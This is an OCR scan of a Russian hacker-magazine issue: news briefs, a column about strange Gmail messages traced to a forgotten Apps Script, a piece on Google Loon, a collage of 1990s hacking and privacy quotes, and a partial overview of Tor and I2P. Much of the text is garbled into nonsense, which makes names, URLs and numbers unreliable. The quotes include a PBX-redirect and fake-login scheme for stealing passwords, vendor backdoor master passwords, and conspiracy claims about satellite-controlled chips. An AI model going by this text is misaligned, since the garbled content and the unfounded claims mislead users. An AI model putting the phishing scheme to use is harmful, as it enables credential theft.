Проще стало создавать и сложные группы контролов. Например, раньше для созда- 
ния сложных кастомных форм требовалось проявить недюжинное терпение, разобраться 
в хитросплетениях стилей и вложенных контейнеров, а иногда приходилось заглядывать 
в исходный код самих страниц документации. В версии 3З.х структура верстки значительно 
упростилась, избавилась от лишних элементов и стала намного логичнее. 


Вос гар 3 


Зеек, {и уе, апа ромеги! по е-Вгз{ Гоп-епа гатем/огк 
тог Та\ег апа еазег меб аеуеортеге. 


Назчв ыре ЦИИ не ПТ м3 65 ЧОВЕСЕОАИЯ, СИСМАИИИКОКаНОНЫ перер Фо ВНОК ПРИ ОСАО КАХА ГИ ИСаИИС ИИ а АНЯ ЕНСИААСГ ради сни 


Оомитюаа Воствтгар 


сока ог Восбагар 2.3.2 Фес 'ИЛе“ие полив [ср не РИ ЗАИР мае ЗАТ Котлас ли Поесть 25 Рбекяия Пн БСК Ген” сре 


СЕАНС СЛЕЗА) СЕИСО ВОЕН 


СыаНЫЬ реснесй  Рхягирйея  Сурсситх Вок гар Е кую 


Обновленный дизайн главной страницы Воо{$1гар как бы говорит нам, что сайтов в Ме{го- 
стиле теперь будет много. Очень много. Интересно, сколько продержится этоттренд? И когда 
М!сго5о придумает новое название этой стилистики, взамен запрещенной? 
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ОТОБРАЛИ 
УМОШЕННИКОВ 
И ОТДАЛИЛЮДЯМ 


—> В июне текущего года американские власти кон- 
фисковали 46 подозрительных доменов, что является 
обычной практикой на Западе. Вот только регистрация 
всех доменов истекла месяц спустя, а продлить ее 
федералы забыли. В итоге домены вернулись в об- 
ращение как ни в чем не бывало. 


ЗО-СКАНЕР В ПАРУ 
ЗО-ПРИНТЕРУ 


—> На Кск\ацег за сутки собрал финансирование 
проект по созданию бюджетного ручного ЗО-сканера. 
Рие! 30 будет стоить всего 990 долларов (сейчас по- 
добные устройства обходятся в несколько тысяч дол- 
ларов). Работает девайс как обычный фотоаппарат, 
только он сканирует объект, а не фотографирует. 


ЗООГЬБНАОДНОМ ДИСКЕ 


—> Компании Зопу и Рапазопс решили отложить 
разногласия и объединиться ради создания ново- 

го формата оптических дисков. К 2015 году должна 
увидеть свет первая версия диска емкостью до 300 
Гб. Увы, уже известно, что диски будут несовместимы 
с устройствами чтения СО, О\О и Вуу-гау. 
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ПАРАНОИК? НЕТ! 
КАЖЕТСЯ, НЕТ 
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Паранойей я, в общем-то, не страдаю. Когда нечего скрывать, не так уж 


сильно и запариваешься, что кто-то может читать твою почту или получить 
пароль к твоему ящику. Никакой папки тор зесг& никто там не найдет — ее 
там просто нет. Однако недавно случилась забавная история, которая все 


же заставила заиграть нотки паранойи и у меня. 


СТРАННАЯ АКТИВНОСТЬ В ЯЩИКЕ 
Все началось с того, что я полез в папку с исходя- 
щими письмами, чтобы найти там какой-то мейл. 
И увидел там то, чего никто из нас увидеть бы не хо- 
тел: письма, которые я не отправлял! Это не могло 
быть ошибкой: два письма были отправлены бук- 
вально только что и два точно таких же днем ранее. 
Все дела тут же были отложены в сторону, 
и голова быстро загрузилась одним-единствен- 
ным вопросом: что за фигня? (Новый закон 
о СМИ запрещает нам использовать более жест- 
кие формулировки этого вопроса, хотя тут они 
могли бы быть уместны.) 


РАССУДИТЕЛЬНОСТЬ 

Надо сказать, что письма были очень странными 
и даже бессмысленными. Это совершенно точ- 
но не был спам. И не какие-то личные данные. 
Это вообще не было похоже ни на что, кроме 
как на сообщение от системы мониторинга. 

В заголовке было указано «\М\Мебзйе аомп», а в 
теле письма фигурировал адрес ПЁр://ама.хакер. 
ги (это часть сайта, посвященная О\О-диску жур- 
нала) с подписью «Непредвиденная ошибка». 
Но я не помню, чтобы настраивал мониторинг. 
Тем более с отправкой уведомлений на адрес 
мацкК$6х@$ПаЧазег$.сот. Пикантности добавля- 
ло то, что этот сервис используется для создания 
временных ета!Гов, ия его точно видел впервые. 

Я посмотрел хедеры одного из писем, где 
явно было указано, что письмо отправлялось 
через ЭМТР. На всякий случай я отправил мейл 
через веб-морду Ста!а и убедился, что хедеры 
в этом случае подставляются другие. Значит, до- 
ступ был получен не ко всему аккаунту, а, скорее 
всего, кодному из паролей приложений (в случае, 
когда включена двухфакторная авторизация, не- 
обходимо создавать статические пароли, чтобы 
использовать их в приложениях, которые двух- 
факторную авторизацию не поддерживают, — 
например в почтовых клиентах). Быстрое реше- 
ние — отозвать все пароли приложений. Изменил 
я и обычный пароль — ну так, на всякий случай. 

Я практически сразу открыл лог активностей, 
в котором фиксируются все обращения к аккаун- 
ту (в том числе для отправки почты по ЗМТР). Ни- 
каких подозрительных 1Р-адресов не было. Это, 
с одной стороны, радовало — значит, с других 
машин обращений не было. Но, с другой сторо- 
ны, пугало — значит, используется одно из моих 
устройств? Но какое?! Я пошел спать. 


НЕПОНИМАНИЕ 
Сложно описать словами удивление, когда 
на следующее утро я увидел те же самые письма. 


И это после того, как были сменены все пароли. 
Задача явно становится интереснее. Кажется, 
единственный вариант в том, что одно из моих 
устройств заражено. Но в это верилось слабо: 

1. В последнее время я работаю только 
на Мас и после смены паролей нигде, кроме 
как на своем ноутбуке, пассы не вводил. Не- 
ужели заражена О$ Х? Тут я впервые в жизни 
поставил на мак антивирус, который, есте- 
ственно, ничего не нашел, но зато сделал что- 
то ужасное с системой, из-за чего ее потом 
пришлось переустановить. 

2. Ранее я отозвал все пароли приложений, а, 
судя по хедерам, письма все равно отправля- 
лись через ЗМТР. Но без пароля приложения 
это невозможно! 

3. В списке активностей не было записей на вре- 
мя отправки сообщений. \/МТЕ? 


ПОЧТИ ПАНИКА 

К этому времени я уже успел отправить задачку 
многочисленным друзьям из сферы ИБ и рабо- 
тающим в Соод!е (кстати, выяснилось, что у Ятай 
нет никакой возможности написать или позвонить 
в суппорт), но никакого сколько-нибудь вразуми- 
тельного объяснения не было. 

Я решил сделать еще один эксперимент: 
на защищенном канале (мало ли кто снифает 
\М-Н — выше я писал, что не страдаю параной- 
ей, — видимо, я соврал), а именно ЗС оператора, 
ис 99,99% незараженного устройства (взял 1Раа 
М!) яеще раз поменял пароль. Вышел из систе- 
мы и болыше пароль не вводил. 


ЭТО НЕВОЗМОЖНО! 

Надо ли говорить, что я увидел в ящике поутру? 
Черт подери, там были те же самые письма, 
отправленные от моего имени! Это уже было 
не смешно. Я не входил в аккаунт, и это объек- 
тивно не мог сделать кто-то другой. Что проис- 
ходит? 

К этому моменту я был на 100% убежден, 
что проблема не во мне. И не в моих девайсах. 
Как мне казалось, это был явный глюк СооЧде, 
который никто не мог объяснить. При этом до- 
браться непосредственно до суппорта гугла так 


КОЛОНКА 
СТЕПЫ 
ИЛЬИНА 


и не получалось, хотя ответы (вернее, банальные 
рекомендации) пытались дать разные инженеры 
компании. Что бы ты делал на моем месте? У тебя 
есть догадки? 


РАЗГАДКА 

Когда руки уже опустились, я решилеще разтрез- 
во на все посмотреть. Все же на глюк это похоже 
не было. Письма явно относятся к \а.хакер.ги, 
то есть имеют связь со мной — это не может быть 
совпадением. И я не исключал, что когда-то дей- 
ствительно настраивал мониторинг. 

И тугменя осенило. Я зациклился на почте, но, 
возможно, дело в каком-то другом сервисе гугла? 
Я когда-то делал мониторинг сайтов на Сооде 
Арр Епдте, а еще... В этот момент я открыл 
Соодге Оос$ и вбил там злополучный адрес, на ко- 
торый уходили письма, — таик$ох@$ПайЧазеге. 
сот. Ответ сервера сразу поставил все на свои 
места. Я все вспомнил! 

Соодче Вос$ нашел документ «Копия [$ Му ЗЦе 
Бомт — Оова! пшзриаНоп». Когда-то очень давно 
я игрался со скриптовым движком таблиц боод!е 
Оос$ (что-то вроде \ВА в Ехсе!е) и пробовал де- 
лать разные интересные вещи — кажется, у нас 
даже был на эту тему Ргоот-0{-сопсер\. Тогда 
я наткнулся на статью о том, как реализовать 
мониторинг веб-сервера только на Соодче Оос$ 
(БИ. У/НУОЧ), и сделал копию предложенного 
скрипта. Скрипт использовал функцию для по- 
лучения страницы (УПЕаспАрр) и функцию 
для отправки сообщения (МайАрр.зепаЕтай). 
Причем адрес сервера я поправил (на а\а. 
хакер.ги), аадрес получателя оставил авторский. 
Скрипт почему-то засбоил и начал каждую ночь 
отправлять алерты, которые чуть не свели меня 
сума :). 

Оказалось, что это никакой не глюк, не АРТ 
и не заговор, а банальный склероз, помножен- 
ный на паранойю. Я забыл про свой же скрипт. 


Р. $. И все-таки задачка получилась интересной. 
А ситуация все равно вызывает вопросы. Какой- 
то скрипт может слать сообщения от твоего име- 
ни, и это никак не отображается в логе активно- 
сти. Почему? Получается идеальный механизм 

для скрытной отправ- 


©, $4ерап.Путп@атай.сотт 


10 тдукз5х | 


ЕхсерНоп: Непредвиденная ошибка: Вр://дуд.хаКер.ги/ 


ки сообщений, если 
есть доступ к Сбооде- 
аккаунту. И ведь 


наверняка можно 
сделать управление 
рассылкой — через 


Что за фигня? 


те же самые скрипты 
Сооде Вос$! 27 


Неааег 
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гоо{-оГг-Сопсер! 


Ш. ИНТЕРНЕТ ЧЕРЕЗ ВОЗДУШНЫЕ ШАРЫ 


1.5 


ЧТО ЭТОТАКОЕ 

В июне 2013 года компания Сооде официально 
анонсировала проект !ооп (доое.сот/Лооп), ко- 
торый придуман в научно-исследовательской ла- 
боратории СооЧдЕе Х. 

В рамках проекта Ёооп планируется запустить 
множество воздушных шаров на солнечных бата- 
реях курсировать в стратосферных ветрах на вы- 
соте 20 км. Ветры на такой высоте постоянные, 
устойчивые и часто дуют в направлении вдоль 
экватора, так что шары должны вращаться во- 
круг планеты на одной параллели со скоростью 
8—30 км/ч. За счет большого количества шаров 
можно обеспечить сплошное покрытие земной 
территории на конкретной параллели. 

Сами шары относительно дешевы, так 
что у СооЧе не должно возникнуть проблем под- 
нять в небо нужное количество и заменять их пе- 
риодически. Конструкция сделана с таким расче- 
том, что каждый шар сможет непрерывно работать 
более 100 дней, хотя первые опыты показывают 
меньший срок службы. На высоте 20 км нетни дож- 
дей, ни самолетов, так что единственной пробле- 
мой для шаров видится непредсказуемый ветер. 


ЗАЧЕМ ЭТО НУЖНО 

До сих пор две три населения земного шара 
не имеют доступа в интернет. Оптоволокно дорого 
и невыгодно тянуть в труднодоступные и малоза- 
селенные районы. Компания Сооде предлагает 
решить эту проблему. Пропускной способности 
каналов должно хватить, чтобы обеспечить ско- 
рость доступа, сравнимую с ЗС. 

Организованные в единую коммуникационную 
сеть шары Соое обеспечат связь на обширных 
территориях по всему миру, в том числе во время 
стихийных бедствий. Каждый шар покрывает зону 
суши диаметром 40 км. 


КАКЭТО РАБОТАЕТ 
Каждый аппарат состоит из «конверта» (15-ме- 
тровой полиэтиленовой оболочки, наполняемой 


Рис. 1. Схема конструкции летательного 
аппарата с оборудованием 


гелием) с парашютом для контролируемого спу- 
ска, солнечных батарей площадью в несколько 
квадратных метров и коробки с оборудованием 
весом около 10 кг (рис. 1). В коробке находятся 
аккумуляторы, электроника и радиопередатчики 
для связи с соседними шарами и с абонентами 
на земле. Аккумуляторы накапливают энергию 
днем, чтобы ее хватало на работу оборудованию 
ночью. При хорошем солнце панели обеспечива- 
ют ток 100 ВТ. 

Радиопередатчики шаров работают на нели- 
цензируемых «научных» частотах 15М, в диапазо- 
нах 2,4 ГГц и 5,8 ГГц. Для связи с ними использу- 
ются самодельные модемы в виде красных сфер 
(рис. 3). Частоты совпадают с частотами стандарт- 
ного \М/!-[т, но сигналы можно отфильтровать. 

На первом этапе эксперимента около 30 шаров 
успешно вывели в стратосферу на 40-й параллели 


Рис. 2. Полезная нагрузка аппарата: коммуникаци- 
онный модуль (справа), контроллер высоты (в цен- 
тре) и отсек для электроники (слева) 


в южном полушарии. Разработанные компьютер- 
ные алгоритмы позволяют предсказывать, в ка- 
кой зоне следует добавить шар для обеспечения 
сплошного покрытия, и его запускают с таким 
расчетом, чтобы ветер вывел шар именно в задан- 
ную точку. Для этого требуется найти поток ветра 
нужного направления и скорости. Из центра управ- 
ления полетами следят за координатами каждого 
шара и при необходимости изменяют его высоту. 
Зная скорость и направление ветра на каждой вы- 
соте, можно маневрировать. 

В первом эксперименте для тестирования 
радиосвязи приняли участие около полусотни до- 
бровольцев. В будущем Сооде собирается про- 
должить эксперимент. На той же 40-й параллели 
будет запущено до 300 шаров, все вместе они 
обеспечат связь для абонентов в Новой Зеландии, 
Австралии, Чили и Аргентине. = 


Рис. 3. Модем для выходавинтернетчерез воздушные шары Сбоод!е 
Гооп установлен накрыше дома одного из участников эксперимента 


Рис. 4. Блок с фотоэлементами для питания электроники, 
которая прикреплена с обратной стороны 


Рис. 5. Шар поднимается 
ввоздух 
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ДВАДЦАТЬ ЛЕТ 
ПАРАНОЙИ © 


За последние 15 лет люди очень легко привыкли 
к вниманию Большого Брата и его маленьких по- 
мощников — к глазкам телекамер, которые следят 
за ними из каждой подворотни, к биометриче- 
ской аутентификации, к открыванию сумок перед 
лицом охранника в кинотеатрах и прочих при- 
сутственных местах, к раздеванию в аэропортах 
и ккомпьютерным играм, которые не запускаются 
без постоянного доступа в интернет. Эти же люди, 
читая новости про Сноудена, искренне удивля- 
ются, они возмущаются, они не могут в это 
поверить! Каждая утечка, каждый перехват, 
каждое использование личной информа- 
ции в чужих корыстных целях их удив- 
ляет — они от души охают, смотря 
новости по телевизору или читая их 
в Сети. Странная амбивалентность! 
Может быть, это что-то новень- 
кое? Когда появилась потреб- 
ность в сохранении своей римасу, 

в криптографии, в анонимности, 

в защите своего права на сво- 
бодное получение информации? 

Мы в прошлом. Шикарный 
Репиит 166 МГц с 16 Мб ОЗУ. 
Такой есть не у каждого, это но- 
винка! К сожалению, на нем нет 
СО-ВОМ и звуковой карточки — 
боипа Нафчег 16 стоит недеше- 
во. Зато у нас есть модем на 33,6 
кбод — окнов мир ЕТ№-сетей, ВВ$’ок 
и такого молодого и недешевого ин- 
тернета. Запустим Ищете Ехрюгег 4.0 
и посмотрим, что говорят люди... 


1998 ГОД 
«А чтобы действительно тебя никогда не зало- 
вили хоть на 10 тысяч долларов, надо выходить 
не со своего телефона, а с АТС или телефон- 
ного аппарата. Не знаю, как в других странах, 
но в Эстонии у некоторых телефонных аппаратов 
сверху прямо видны телефонные линии.» 

«В первую очередь надо не показывать свой 
|Р-адрес, а если уж показывать, то неверный. Есть 
много предложенных способов, но пока я не ви- 
дел ни одного, чтобы он действительно работал.» 


1994 ГОД (ИЗ ЭЛЕКТРОННОГО ЖУРНАЛА 
|МРЕСТЕО УО!СЕ, ПОСВЯЩЕННОГО КОМ- 
ПЬЮТЕРНЫМ ВИРУСАМ) 

«Почтовый адрес: КИЕВ-148, а/я 10 «ЗеайП» 
(абонентский ящик тогда считался вполне адек- 
ватной защитой, никому и в голову не приходи- 
ло, что правоохранительные органы могут за- 
няться вирусным журналом. — Прим. ред.).» 


1997 ГОД (ИЗ ЭЛЕКТРОННОГО ЖУРНАЛА 
|1МЕЕСТЕО УО1СЕ, ПОСВЯЩЕННОГО КОМ- 
ПЬЮТЕРНЫМ ВИРУСАМ ) 

«У Клуба появился свой етай-адрес, так что те- 
перь Вы имеете возможность писать нам по 


ВРЕМЯ ДЕЙСТВИЯ 


Все цитаты относятся кпериоду 
1995—1998 годов. 


|цетегу. Письма лучше всего шифровать РОР. 
Если у Вас нет пакета РСР и Вы имеете жела- 
ние написать нам, сообщите нам об этой почтой 
или ета!’ом, и мы вышлем Вам этот пакет. Да, 
иеще — люди, когда вы получаете наши бандеро- 
ли, не обращайте внимание на фамилию и имя от- 
правителя, какими бы они ни были, и ужтем более 
не указывайте эти фамилии при написании на а/я 
10. (Хорошим тоном для параноика тех времен 
считалась переписка с помощью РС@Р единствен- 
но верной версии — 2.6.1 ог ОО$ с длиной ключа 
не менее 1024 бит (тогда это считалось хорошей 
длиной ключа). РОР вообще нравился паранои- 
кам того времени — им импонировало, что его 
запрещали к экспорту из США, а у Циммермана 
бывали проблемы с правительством. И это 1997 
год! Многие ли сейчас используют асимметрич- 
ное шифрование при переписке? — Прим. ред.)» 

«Заметайте следы. Подозреваете, что кто-то 
следит за вами? Хотите бродить по Сети инког- 


нито? Это можно сделать, если начать путеше- 
ствие с мммм.1ргоху.сопл — бесплатной службы, 
которая удаляет ваш сетевой адрес из сооке- 
счетчиков и файлов доступа других серверов.» 

«Интересуетесь, не заведено ли на вас до- 
сье? Сайт Реа\М\ойа поптаНоп МемогКк (м/мим. 
Тед мойа.ачо\) поможет вам найти информацию 
любого рода, включая предлагаемые для прода- 
жи правительственные документы.» 


ЭЛИНОР МИЛЗ, 1997 ГОД 
«Введите правило использования паролей 
доступа к файлам, содержащим секрет- 
ную или ответственную информацию.» 


ПЯТНИЦА, 11 СЕНТЯБРЯ 
1998, ГАЗЕТА «МОСКОВ- 

СКИИ КОМСОМОЛЕЦ» 

«Сын известного московского 
композитора, музыкальноготео- 
ретика, автора обработки «Вре- 
мен года» Чайковского для ка- 
мерного оркестра, 21-летний 
Илья Гэбман [МаёзегрМТ //АУС] 
был задержан во вторник вме- 
сте со своими друзьями за хи- 
щение 20 тысяч долларов сра- 

зу из нескольких американских 


виртуальных магазинов через 
Интернет.» 
«Найти какой-нибудь левый 


прокси для \м/^мм достаточно легко, 
подобный сервис для ПВС, 1СО и иже 
с ними встречается, мягко говоря, очень 
редко и для простого Чаир-пользователя 
практически недоступен. Именно поэтому 
большая часть средств для атаки по [Р заточена 
под всевозможные 1ВС-клиенты.» 

«Оговорюсь, что мы будем исходить из пред- 
положения, что имя домена или!Р-адрес пользо- 
вателя в 1ВС подделать очень сложно и подавля- 
ющее большинство людей этим не занимаются, 
хотя такие методы и есть. На ум приходят два ме- 
тода: |Р зроойпд и использование специального 
прокси-сервера, способного поддерживать 1ВС- 
протокол. Техника, называемая |Р $роойпд (об- 
ман |Р), весьма сложна в применении. Хакерские 
сайты предлагают пользователям \/тадо\$ 
95 с версией \Мтзоск 2.0 и выше несколько 
программ для подобных проделок.» 

«М!сго$ой ОицЙоок Ехрге5$ 4.0 — все письма, 
которые вы когда-либо отправляли, получали 
или удаляли, он все равно хранит в своей базе. 
Поэтому периодически рекомендуем удалять 
(лучше невосстановимыми методами, например 
с помощью программы Кгет!п 2.1) эти файлы. 

Существует мнение, что такие программы, 
как, например, операционная система \пт- 
Чо\мз, способны как бы следить за всем, 
что происходит в компьютере (либо сами, либо 
по команде из Интернета), и отправлять все 
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собранные данные своим разработчикам (кто-то 
сказал СооФе Спготе, СПготе ОЗ? Кто сказал, 
кто подумал? — Прим. ред.).» 

«Недавно был скандал, когда один извест- 
ный ЕТР-клиент отправлял все вводимые имена 
и пароли своим разработчикам. Так что будьте 
бдительны! 

Полностью защищенный компьютер — это 
тот, который стоит под замком в бронированной 
комнате в сейфе, не подключен ни к какой сети 
(даже электрической) и выключен. 

Практически все ПО, —экспортируемое 
из США (включая ПО для шифрования), имеет 
так называемые «люки» или «черные ходы». 

Работает глобальная система прослушивания 
телефонных разговоров — СОРМ. Подробнее см. 
разделотелефонии. Практически все микросхемы 
и электронные компоненты, производимые 
в США и других западных странах, способны «вы- 
ходить из строя» по команде со спутника, а так- 
же передавать нужную информацию на спутник. 
Практически вся военная техника может быть вы- 
ведена из строя командой со спутника.» 


1996 ГОД 

«Компании обязаны обеспечить спец- 

службам возможность контроля любых 

передаваемых данных, в частности — 
сообщений, посылаемых по эле- 

ктронной почте. Так же как и в слу- 
чае с сотовыми и пейджинговыми 

фирмами (см. «ДП» № 43/96), 

провайдеры обязаны за свой 

счет создать такие возмож- 
ности и предоставить Феде- 
ральной службе безопасности 
соответствующую аппа-ратуру 
для перехвата инфо-рмации. 

Ветайегов в сети много, 
некоторые из них позволяют 
указывать фиктивный адрес 
отправителя, большинство же 
прямо указывают в заголовке, 
что сообщение анонимно. Вы 
можете воспользоваться римей- 
лером, послав сообщение поадресу 
гетайег@гер!ау.сот, указав Зи бес:: 
гетайег-пер. 

В любой аппаратуре сотовой связи 

на этапе разработки закладываются воз- 

можности: 

. представление информации оточном место- 
положении абонента (с точностью до метров); 

. запись и прослушивание разговоров; 

.‚ фиксация номеров (даты, времени, категории 
ит д.) вызывающей и принимающей вызов 
стороны; 

. Дистанционное включение 
для прослушивания ит. д. 


микрофона 


Более того, в связи с тем что (для 
разведывательных целей) алгоритмы 
кодирования и защиты в сотовых системах 
связи намеренно ослаблены, они становят- 
ся ловкой добычей для разного рода хакеров 
и проходимцев. 

Далеко не все прокси-серверы являются 
полностью анонимными. Проверьте свой прокси 
на предмет его полной или неполной анонимно- 
сти: Ир: //мм/м{ато$.сот/бт/ргоху.са1. 

Если вы получите сообщение Ргоху $зегуег 1$ 
ащецеа! — ваш прокси имеет «дыру».» 


1997 ВУМКЕ $МТН 
«Наверняка у вас в офисе есть мини-АТС. 
Перепрограммировать ее, чтобы звонки с дан- 


Двадцать лет паранойи 


ного номера перероучивались на ваш, — плевое 
дело. Осталось только запустить терминальную 
программу ака ВВ$, в заставке указать заставку 
вашего провайдера ;). И юзер ведь купится! На 
100%. Введет и 1одт, и раззмога. 

\М/паом/$ 98, на мой взгляд, имеет принципи- 
ально новую черту. Теперь каждая отдельная ко- 
пия этой операционной системы на каждом кон- 
кретном ПК в момент подключения к Интернет 
становится частью огромной единой глобальной 
операционной системы Мгсгоз$оЙ. Самым без- 
обидным или даже незначительным побочным 
эффектом является автоматическое обновление 
(изменение?) внутренних частей \\Мпаом/5 98. 
А главным становится то, что в момент подклю- 
чения к Интернет фактически ВСЕ содержимое 
жесткого диска любого компьютера становится 
доступным Микрософт (ой вэй, так об этом нам 
говорили еще в прошлом веке! — Прим. ред.). 


О1$СТАМЕВ 


Все цитаты, которые мы привели в этой 
статье, принадлежат их авторам. Иногда 
анонимным. Мнение авторов цитат мо- 
жет не совпадать ни счем, кроме мнения 
авторов цитат, а их утверждения — быть 
порождением их души (быть может, 
больной). 


Новый Большой Брат (М!сгозоЙ) непрерыв- 
но круглосуточно сканирует содержимое жест- 
ких дисков десятков или даже сотен миллионов 
компьютеров по всему миру (и ваш домашний 
ПК тоже, если у вас установлена \М/таом/5 98) 
через Интернет, извлекает и скачивает инфор- 
мацию о версии операционной системы, об ап- 
паратуре (звуковой и видеокарте, модеме, жест- 
ком диске и т. д.) и программном обеспечении, 
установленном на ПК, анализирует и в случае не- 
обходимости автоматически через Интернет об- 
новляет части операционной системы, драйверы 
и другое программное обеспечение. 
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Дело идет к тому, что на земле останется 
только ОДНА КОПИЯ одной глобальной сете- 
вой распределенной операционной системы 
\ММпаом/$! Все компьютеры по сути превратятся 
В «сетевые компьютеры», их работа без подклю- 
чения к Интернет будет функционально сильно 
ограничена. Все жесткие диски всех компьюте- 
ров будут являться частью ОДНОЙ единой се- 
тевой распределенной файловой системы под 
управлением одной копии одной глобальной 
операционной системы \\ИпЧо\м/$.» 


ПАВЕЛ СЕМЬЯНОВ, ЦЕНТР ЗАЩИТЫ 
ИНФОРМАЦИИ СПБГТУ, 1996 ГОД 
«Причины наличия люков в криптосистемах оче- 
видны: разработчик хочет иметь контроль над 
обрабатываемой в его системе информацией 
и оставляет для себя возможность расшифро- 
вывать ее, не зная ключа пользователя. Воз- 
можно также, что они используются для отладки 
и по какой-то причине не убираются из конечно- 
го продукта. Естественно, что это рано или позд- 
но становится известным достаточно большому 
кругу лиц и ценность такой криптосистемы ста- 
новится почти нулевой. Самыми известными 
примерами здесь являются АМААО ВО$ 
с его универсальным паролем «АМАВО_ 
5М/ и СУБД Рагааох фирмы Войапа 
|мегпайопа!, также имеющая «супер- 
пароли» «Л@САе» и «пхббррх». 
Вплотную к наличию люковвре- 
ализации (очевидно, что в этом 
случае они используют явно не- 
стойкие алгоритмы или хранят 
ключ вместе с данными) примы- 
кают алгоритмы, дающие воз- 
можность третьему лицу читать 
зашифрованное сообщение, 
как это сделано в нашумевшем 
проекте СЧРРЕВ, где третьим 
лицом выступает государство, 
всегда любящее совать нос 
в тайны своих граждан. 
Во многих книгах по без- 
опасности предлагается вы- 
бирать в качестве надежного 
пароля два осмысленных слова, 
разделенных некоторым знаком, на- 
пример «дооа!ра$$мога». ’Подсчита- 
ем, за сколько времени в среднем будут 
сломаны такие пароли, если такое прави- 
ло включено в набор программы-взломщика 
(пусть словарь 10 000 слов, разделительными 
знаками могут быть 10 цифр и 32 знака препи- 
нания и специальных символа, машина класса 
Репйит со скоростью 10 000 сгур\Ус) := 210 000 
секунд, или всего 2,5 дня!» 


ДМИТРИЙ ЛЕОНОВ, \МЕВОНАСК2ОМЕ.ВО 
«Нежно любимая миллионами пользовате- 
лей 1СО (ПЫр:/Лммим1са.сот) тоже оказалась 
не без греха. На странице РГуодог’$ Ехрой мойа 
помимо прочего приведена информация о сла- 
бостях 1СО’шного протокола, которые уже по- 
зволили создать многочисленные программы, 
делающие жизнь пользователя 1СО не слиш- 
ком пресной. Так, например, на странице 1СО9 
ЗпооТег Теат предлагается опробовать про- 
грамму, позволяющую слать сообщения по 1С@ 
с чужого (ЛМ. Зпоотег существует в двух вариан- 
тах — в виде скрипта, доступного со страницы, 
и в виде программы, которую обещают рассы- 
лать по почте. Для его использования достаточ- 
но знать |Р-адрес адресата, номер порта, на ко- 
тором висит !СО, и М отправителя. Инструкция 
прилагается.» = 
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ОБЗОР СПОСОБОВ ОСТАВАТЬСЯ АНОНИМНЫМ В СЕТИ 


Так уж иногда случается, что фантастические и шпионские 
сюжеты оказываются не только плодом больной фантазии ав- 
тора, а самой настоящей правдой. Еще совсем недавно какой- 
нибуль параноидальный фильм о тотальной слежке государ- 
ства за человеком воспринимался как очередная сказка, игра 
воображения автора и сценаристов. До тех пор, пока Эдвард 
Сноуден не обнародовал информацию о РЕМ — программе 
слежения за пользователями, принятой на вооружение Агент- 
ством национальной безопасности США. 


ПОВОД ДЛЯ БЕСПОКОЙСТВА 

После такой новости шутки про паранойю стали 
совсем не актуальны. А разговоры про слежку 
нельзя больше списать на расшатанную психику. 
Возникает серьезный вопрос, можно ли чувство- 
вать себя в безопасности, пользуясь своей почтой 
или общаясь в социальной сети или чате? Ведь 
на сотрудничество со спецслужбами пошли мно- 
гие крупные компании: Мгсгоз$ой (Но\{тай), Сооде 
(Сооде Май), Уапоо!, Еасербоок, УочТире, $Куре, 
АО, Арре. Учитывая то, что РЕЁЗМ была нацеле- 
на в первую очередь на слежку за иностранными 
гражданами, а объем перехватываемых телефон- 
ных разговоров и электронных сообщений по не- 
которым оценкам достигал 1,7 миллиарда в год, 
стоит серьезно задуматься над тем, как защитить 
свою частную жизнь от чужих глаз. 


ТОВ 

Первая реакция на новость о РЕЗМ у многих 
была одинакова: не позволим следить за собой, 
ставим Тог. Это, пожалуй, действительно самое 
популярное средство, о котором мы не один раз 
рассказывали на страницах нашего журнала. 
Он тоже был создан американскими военными, 
правда для совсем противоположных целей. Та- 
кая вот ирония. Пользователи запускают на своей 
машине программное обеспечение Тог, работаю- 
щее как прокси, он «договаривается» с другими 
узлами сети и строит цепочку, по которой будет 
передаваться зашифрованный трафик. По ис- 
течении некоторого времени цепочка перестра- 
ивается и в ней используются уже другие узлы. 
Для сокрытия от любопытных глаз информации 
о браузере и установленной ОС Тог часто ис- 


пользуется в связке с РИуоху — некеширующим 
прокси, который модифицирует НТТР-заголовки 
и веб-данные, позволяя сохранить приват- 
ность и избавиться от назойливой рекламы. 
Чтобы не лазить по конфигурационным файлам 
и не править все настройки ручками, есть за- 
мечательная ОМ-оболочка — \Мдайа, доступная 
для всех ОС и позволяющая за пару минут под- 
нять на своем ПК дверь в анонимный мир. Плюс 
разработчики попытались все максимально упро- 
стить, предоставляя пользователям возможность 
в один клик установить себе Тог, Майа и рощаые- 
версию РгеТох с различными зесийу-аддонами. 
Для безопасного общения существует децентра- 
лизованная анонимная система обмена сообще- 
ниями — ТогСпае Для безопасного, анонимно- 
го и прозрачного перенаправления всего ТСР/ 
Р- и ОМ№$-трафика через сеть анонимайзеров 
Тог служит утилита То\Иа. Программа позволяет 
анонимно запускать на компьютере под \М/пао\м/$ 
любое программное обеспечение, даже если 
оно не поддерживает ЗОСК$ или НТТР-прокси, 
что раньше было практически невозможно сде- 
лать под \М/пао\м/5. Помимо этого, для стандарт- 
ной связки Тог + \Маайа + Риуоху существует до- 
стойная альтернатива — А4\уапсеа Опюп Вощег 
(Ои.[у/апсхН7), роЦЧаШе-клиент для «луковой 
маршрутизации». Для тех, кто особенно обеспо- 
коен своей безопасностью, есть Шме СО дистри- 
бутив, который «из коробки» настроен отправлять 
весь трафик через Тог, — БИ.1у/е1янН6. 

Основное предназначение Тог — это аноним- 
ный серфинг плюс возможность создания аноним- 
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ных сервисов. Правда, за анонимность приходится 
расплачиваться скоростью. 


12Р 

Кроме «луковой маршрутизации», есть еще 
И «чесночная», применяемая в 12Р. Тог и 12Р 
при некотором внешнем сходстве во многом ре- 
ализуют диаметрально противоположные под- 
ходы. В Тог создается цепочка из нод, по которой 
передается и принимается трафик, а в 12Р ис- 
ПОЛЬЗУЮТСЯ «входящие» и «выходящие» туннели 
и таким образом запросы и ответы идут через 
разные узлы. Каждые десять минут эти туннели 
перестраиваются. «Чесночная маршрутизация» 
подразумевает, что сообщение («чеснок») может 
содержать в себе множество «зубчиков» — полно- 
стью сформированных сообщений с информаци- 
ей по их доставке. В один «чеснок» в момент его 
формирования может закладываться много «зуб- 
чиков», часть из них может быть нашими, а часть 
транзитными. Является ли тот или иной «зубчик» 
В «чесноке» нашим сообщением, или это чужое 
транзитное сообщение, которое проходит через 
нас, знает только тот, кто создал «чеснок». 

Основная задача [2Р, в отличие от Тог, — ано- 
нимный хостинг сервисов, а не предоставление 
анонимного доступа в глобальную сеть, то есть 
размещение в Сети веб-сайтов, которые в терми- 
нологии [2Р называются еерз(е$. 

Для работы программного обеспечения 1|2Р 
необходима предустановленная чуама. Все управ- 
ление ведется через веб-интерфейс, который 
доступен по адресу 127.0.0.1:7657. После всех 
необходимых манипуляций надо подождать пару 
